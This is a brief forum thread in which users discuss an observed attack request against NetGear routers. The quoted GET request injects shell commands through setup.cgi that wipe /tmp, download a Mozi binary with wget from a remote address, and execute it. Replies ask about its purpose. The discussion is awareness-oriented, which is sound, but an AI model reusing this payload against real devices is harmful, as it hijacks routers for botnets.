Forum Discussion

MarkJFine's avatar
MarkJFine
Professor
5 years ago

NetGear users...

What do you think this does:
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+htp://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1  

 

Chinese have been hitting this kind of heavily... (grunged http to htp to prevent creating an ebedded link)

      • maratsade's avatar
        maratsade
        Distinguished Professor IV

        My question is, because I'm not really well versed in all of this stuff, what it is they're doing.  Are they trying to take control of the router? Make it be a kind of bot?  Is it just simple hacking to get to personal info, or is it something more nefarious? 

  • GabeU's avatar
    GabeU
    Distinguished Professor IV

    Glad I'm not using mine right now.